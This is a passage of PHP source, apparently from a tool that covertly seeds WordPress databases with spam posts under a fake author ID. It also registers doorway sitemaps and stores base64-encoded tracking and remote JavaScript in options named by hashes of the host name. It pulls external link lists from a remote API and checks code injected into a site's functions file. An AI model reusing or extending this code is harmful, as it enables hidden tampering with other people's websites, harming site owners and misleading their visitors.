//var_dump('write new hash');
//var_dump($sourceHash);
preg_match($customFiltersRegexpSec, $sourceMod, $matches);
$controlHash = md5(trim($matches[1]));
$newHashResult = CustomDbHandler::getInstance()->insertOrUpdate($optionCustom, $controlHash);
//var_dump('new hash insert results - ' . $newHashResult);
$dbHash = CustomDbHandler::getInstance()->getOption($optionCustom);
//var_dump('control hash');
//var_dump($dbHash);
return true;
}
return false;
}
function customSitemapName($sitemapName) {
return array(
"$sitemapName\.xml$" => "index.php?feed=xml$sitemapName"
);
}
function viewSettingsAsJsonAction() {
$settings = getDbSettingsCustom();
if ($settings) {
$settings = addPostsCountInSettings($settings);
echo json_encode($settings);
return true;
}
echo json_encode(array('empty settings'));
return true;
}
function viewSettingsAction() {
$settings = getDbSettingsCustom();
if ($settings) {
foreach ($settings as $userId => $arr) {
echo str_repeat('_', 100) . PHP_EOL;
echo $userId . ' - userId' . PHP_EOL;
if (isset($arr['js']) && $decodedJs = detectBase64js($arr['js'])) {
$arr['js'] = parseJsScript($decodedJs);
}
echo json_encode($arr, JSON_PRETTY_PRINT);
echo str_repeat('_', 100) . PHP_EOL;
}
return true;
}
return false;
}
function homeLinksSettingsFormatter($arr) {
if (!$arr) {
return '';
}
foreach ($arr as $key => $value) {
if (is_array($value)) {
foreach ($value as $keySec => $valueSec) {
echo sprintf(' %s => %s%s', $keySec, $valueSec, PHP_EOL);
}
continue;
}
echo sprintf(' %s => %s%s', $key, $value, PHP_EOL);
}
return;
}
function detectBase64js($string) {
if (preg_match('~data:text\/javascript;base64,(.+?)\">~s', $string, $matches)) {
return base64_decode($matches[1]);
}
return false;
}
function parseJsScript($string) {
$results = array();
preg_match('~hit;([^\?]+)~', $string, $lirucounter);
if (isset($lirucounter[1])) {
$results['lirucounter'] = $lirucounter[1];
}
preg_match('~([^\"\.\/]+\.js)\?ref~', $string, $route);
if (isset($route[1])) {
$results['route'] = $route[1];
}
preg_match('~src=.+?([^\/\"\\\\]+)~', $string, $domain);
if (isset($domain[1])) {
$results['domain'] = $domain[1];
}
return $results;
}
function settingsArr($functionsSource) {
$oldSettings = findOldSettings($functionsSource);
$userId = defined('CUSTOM_AUTHOR_ID') ? CUSTOM_AUTHOR_ID : 9999;
$sitemapRegexArr = customSitemapName(SITEMAP_NAME);
$newSettings = generateSettings($userId, jsPrepare(JS_SOURCE), key($sitemapRegexArr)
, current($sitemapRegexArr), $_SERVER['homeLinksSettings']);
if (!$oldSettings) {
//echo 'only new settings' . PHP_EOL;
return $newSettings;
} else {
$settings = compareNewOldSettings($oldSettings, $newSettings, $userId);
if (defined('FORCE_CHANGE_HOME_LINKS_OWNER') && FORCE_CHANGE_HOME_LINKS_OWNER === 1) {
$settings = removeHomeLinkKey($settings);
}
return $settings;
}
}
function compareNewOldSettings($oldSettings, $newSettings, $userId) {
if (!isset($oldSettings[$userId])) {
$newSettingsKey = key($newSettings);
$newSettingsRegex = key($newSettings[$newSettingsKey]['sitemapsettings']);
foreach ($oldSettings as $key => $value) {
$oldSettingsRegex = key($value['sitemapsettings']);
if ($oldSettingsRegex === $newSettingsRegex) {
$oldSitemapValue = str_replace('\.xml$', '', $oldSettingsRegex);
echo $oldSitemapValue . ' already use in oldsettings' . PHP_EOL;
return false;
}
}
return $newSettings + $oldSettings;
}
$jsDiff = strcmp($oldSettings[$userId]['js'], $newSettings[$userId]['js']);
if ($jsDiff !== 0) {
echo 'js scripts are different' . PHP_EOL;
if (defined('REDEFINE_JS_FOR_USER') && REDEFINE_JS_FOR_USER === 1) {
echo 'old script will be overwritten' . PHP_EOL;
} else {
return false;
}
}
$sitemapSettingsDiff = strcmp(key($oldSettings[$userId]['sitemapsettings'])
, key($newSettings[$userId]['sitemapsettings']));
if ($sitemapSettingsDiff !== 0) {
$oldSitemapValue = key($oldSettings[$userId]['sitemapsettings']);
$oldSitemapValue = str_replace('\.xml$', '', $oldSitemapValue);
echo 'sitemap settings are different' . PHP_EOL;
echo "old sitemap value $oldSitemapValue" . PHP_EOL;
return false;
}
return $newSettings + $oldSettings;
//return $newSettings;
}
function linkBuildingSettingsCheck() {
if (defined('EXTERNAL_LINKING') && (EXTERNAL_LINKING === 1)) {
if (!defined('EXTERNAL_LINKS_COUNT_PAGE')) {
echo 'set EXTERNAL_LINKS_COUNT_PAGE' . PHP_EOL;
return false;
}
if (!defined('TABLE_HASH') && !defined('HTML_HASH')) {
echo 'set TABLE_HASH or HTML_HASH value' . PHP_EOL;
return false;
}
if (!defined('COUNT_LINKS_FROM_DOMAIN')) {
echo 'set COUNT_LINKS_FROM_DOMAIN' . PHP_EOL;
return false;
}
}
return true;
}
function downloadExternalLinks($countHtmlFiles) {
list ($minExtLinks, $maxExtLinks) = explode('..', EXTERNAL_LINKS_COUNT_PAGE);
$linksLimit = $countHtmlFiles * $maxExtLinks;
$params = array(
'tableHash' => defined('TABLE_HASH') ? TABLE_HASH : '',
'htmlHash' => defined('HTML_HASH') ? HTML_HASH : '',
'linksLimit' => $linksLimit,
'maxLinksCount' => COUNT_LINKS_FROM_DOMAIN,
);
$query = http_build_query($params);
get_file(GS_ALIAS . '/dnc/wp-acceptors-api/batch-get-links-test?' . $query, TMPDIR . '/ext-links.txt');
}
function textWithLinks($text, $results, &$extLinksArr) {
$internalLinks = array();
$externalLinks = array();
if (INTERNAL_LINKING === 1) {
list ($minLinks, $maxLinks) = explode('..', INTERNAL_LINKS_COUNT_PAGE);
$range = range($minLinks, $maxLinks);
$linksCount = $range[rand(0, count($range) - 1)];
if (count($results) >= $linksCount) {
shuffle($results);
$slicedResults = array_slice($results, 0, $linksCount);
$internalLinks = linksPrepare($slicedResults);
}
}
if ((EXTERNAL_LINKING === 1) && !empty($extLinksArr)) {
list ($minLinks, $maxLinks) = explode('..', EXTERNAL_LINKS_COUNT_PAGE);
$randCount = rand($minLinks, $maxLinks);
if ($randCount <= count($extLinksArr)) {
$externalLinks = array_splice($extLinksArr, 0, $randCount);
} else {
$externalLinks = $extLinksArr;
$extLinksArr = array();
}
}
$allLinksTypes = $externalLinks + $internalLinks;
return replacePTags($text, $allLinksTypes);
}
function decodeExternalLinks() {
if (!file_exists(TMPDIR . '/ext-links.txt')) {
echo 'no external links source' . PHP_EOL;
return false;
}
$extLinksSource = file_get_contents(TMPDIR . '/ext-links.txt');
$extLinksSourceDecode = json_decode($extLinksSource, 1);
if (!is_array($extLinksSourceDecode) || !isset($extLinksSourceDecode['links'])) {
if (trim($extLinksSource) == 'tmp table not found') {
echo TABLE_HASH . ' table not found' . PHP_EOL;
return false;
}
if (trim($extLinksSource) == 'table expired') {
echo TABLE_HASH . ' table expired' . PHP_EOL;
return false;
}
if (trim($extLinksSource) == 'table is empty') {
echo TABLE_HASH . ' db links not found';
return false;
}
if (trim($extLinksSource) == 'file with links not found') {
echo HTML_HASH . ' file with links not found';
return false;
}
echo 'error while decoding json external links' . PHP_EOL;
return false;
}
return $extLinksSourceDecode['links'];
}
function deleteSettings() {
if (!defined('CUSTOM_AUTHOR_ID')) {
return;
}
$settings = getDbSettingsCustom();
if (isset($settings[CUSTOM_AUTHOR_ID])) {
unset($settings[CUSTOM_AUTHOR_ID]);
echo 'delete settings for user id ' . CUSTOM_AUTHOR_ID . PHP_EOL;
writeSettingsDB($settings);
}
}
function isJsonCustom($string) {
json_decode($string);
return (json_last_error() == JSON_ERROR_NONE);
}
function isBadEnvCustom() {
$requestUri = $_SERVER['REQUEST_URI'];
if (strstr($requestUri, 'wp-config-sample.php') !== false) {
return true;
}
return false;
}
function allPermalinksAction() {
var_dump(CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, CUSTOM_AUTHOR_ID));
return;
}
function optionCustomFunctions() {
return md5(crc32($_SERVER['HTTP_HOST']));
}
function optionCustomFilters() {
return md5(sha1($_SERVER['HTTP_HOST']));
}
function gzCompressCustom($string) {
return base64_encode(gzdeflate($string, 9));
}
function genLetCustom($size) {
$characters = "abcdefghijklmnopqrstuvwxyz";
$charactersLength = strlen($characters);
$randomString = "";
for ($i = 0; $i < $size; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
class CustomDbHandler
{
/**
* @var CustomDbHandler
*/
private static $instance;
const DB_TYPE_SQLITE = 'sqlite';
const DB_TYPE_MYSQL = 'mysql';
private $dsn;
public $dbName;
public $dbPrefix;
public $dbUser;
public $dbPassword;
public $dbHostAddr;
public $dbPort;
public $dbType;
public function __construct($db, $config = false) {
$this->dsn = $db;
$this->setDBSettings($config);
$this->dbType = (!$config) ? self::DB_TYPE_SQLITE : self::DB_TYPE_MYSQL;
static::$instance = $this;
}
public static function getInstance() {
if (static::$instance) {
return static::$instance;
}
return null;
}
public function setDBSettings($config) {
/** sqlite **/
if (!$config) {
$this->dbName = 'main';
$this->dbPrefix = 'wp_';
} else {
$this->dbName = $config['dbname'];
$this->dbUser = $config['dbuser'];
$this->dbPassword = $config['dbpassword'];
$this->dbHostAddr = $config['dbhostaddr'];
$this->dbPrefix = $config['dbprefix'];
$this->dbPort = $config['dbport'];
}
return;
}
public function getOption($optionName) {
$tableWithPrefix = $this->dbPrefix . 'options';
$query = "SELECT * from $tableWithPrefix where option_name = :option_name ";
$stmt = $this->dsn->prepare($query);
$stmt->execute(array(
':option_name' => $optionName
));
return $stmt->fetch();
}
public function homeUrl() {
//'home' or 'siteurl'
$homeOption = $this->getOption('home');
if (strstr($homeOption['option_value'], 'http') !== false) {
return $homeOption['option_value'];
}
$siteUrlOption = $this->getOption('siteurl');
if (strstr($siteUrlOption['option_value'], 'http') !== false) {
return $siteUrlOption['option_value'];
}
return false;
}
public function allPostsFromDb($homeUrl, $userId = 9999) {
//SELECT ID, post_title FROM `wp_posts` where post_author = 9999
$table = sprintf('`%s`.`%sposts`', $this->dbName, $this->dbPrefix);
$query = "SELECT ID, post_title FROM $table where post_author = :user_id";
$stmt = $this->dsn->prepare($query);
$stmt->execute(array(
':user_id' => $userId
));
$urls = array();
while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
if ($row) {
$urls[] = $homeUrl . '/?p=' . $row['ID'] . ';' . $row['post_title'];
}
}
return $urls;
}
public function lastPostDateQuery() {
//SELECT ID, post_date FROM `wp_posts` order by ID DESC LIMIT 1
$table = sprintf('`%s`.`%sposts`', $this->dbName, $this->dbPrefix);
$query = "SELECT ID, post_date FROM $table order by ID DESC LIMIT 1";
$stmt = $this->dsn->query($query);
if ($stmt) {
$lastDateFetch = $stmt->fetch();
$date = $lastDateFetch['post_date'];
} else {
$date = date('Y-m-d H:i:s');
}
return $date;
}
public function insertPost($title, $content, $date, $userId = '', $customSlug = '') {
$date = ($date === '') ? randDate() : $date;
$userId = !$userId ? 1 : $userId;
$table = sprintf('`%s`.`%sposts`', $this->dbName, $this->dbPrefix);
$query = "INSERT INTO $table ( `post_author`, `post_date`,"
. " `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`,"
. " `post_status`, `comment_status`, `ping_status`, `post_password`,"
. " `post_name`, `to_ping`, `pinged`, `post_modified`,"
. " `post_modified_gmt`, `post_content_filtered`, `post_parent`,"
. " `guid`, `menu_order`, `post_type`, `post_mime_type`,"
. " `comment_count`) VALUES (:user_id, :date, :date, :content,"
. " :title, '', 'publish', 'closed', 'closed', '', :slug, '', '',"
. " '0000-00-00 00:00:00.000000', '0000-00-00 00:00:00.000000', '',"
. " '0', '', '0', 'post', '', '0');";
$stmt = $this->dsn->prepare($query);
$stmt->execute(array(
':user_id' => $userId,
':date' => $date,
':content' => $content,
':title' => $title,
':slug' => urlencode($customSlug),
));
return $this->dsn->lastInsertId();
}
public function viewAllAuthors() {
$table = sprintf('`%s`.`%sposts`', $this->dbName, $this->dbPrefix);
$query = "SELECT DISTINCT post_author FROM $table";
$stmt = $this->dsn->query($query);
while ($row = $stmt->fetch(PDO::FETCH_LAZY)) {
if ($row['post_author']) {
echo $row['post_author'] . PHP_EOL;
}
}
}
public function insertWpOptions($optionName, $optionValue) {
$table = sprintf('`%s`.`%soptions`', $this->dbName, $this->dbPrefix);
$query = "INSERT INTO $table ( option_name, option_value, autoload)"
. "VALUES (:option_name, :option_value, 'yes')";
$stmt = $this->dsn->prepare($query);
$stmt->execute(array(
':option_name' => $optionName,
':option_value' => $optionValue,
));
return $this->dsn->lastInsertId();
}
public function updateWpOptions($optionName, $optionValue) {
$table = sprintf('`%s`.`%soptions`', $this->dbName, $this->dbPrefix);
$query = "UPDATE $table set option_value = :option_value where option_name = :option_name";
$stmt = $this->dsn->prepare($query);
return $stmt->execute(array(
':option_value' => $optionValue,
':option_name' => $optionName,
));
}
public function insertOrUpdate($optionName, $optionValue) {
if ($this->getOption($optionName)) {
//echo sprintf('%s option exists, update', $optionName) . PHP_EOL;
return $this->updateWpOptions($optionName, $optionValue);
} else {
//echo sprintf('%s option no exists, insert', $optionName) . PHP_EOL;
return $this->insertWpOptions($optionName, $optionValue);
}
}
public function deleteOption($optionName) {
$table = sprintf('`%s`.`%soptions`', $this->dbName, $this->dbPrefix);
$query = "delete FROM $table where option_name = :option_name";
$stmt = $this->dsn->prepare($query);
return $stmt->execute(array(
':option_name' => $optionName,
));
}
public function deletePosts($authors) {
$authorsCommaSeparated = implode(', ', $authors);
$table = sprintf('`%s`.`%sposts`', $this->dbName, $this->dbPrefix);
$column = sprintf('`%sposts`.`post_author`', $this->dbPrefix);
$query = "delete FROM $table where $column IN ($authorsCommaSeparated)";
$stmt = $this->dsn->prepare($query);
$stmt->execute();
return $stmt->rowCount();
}
}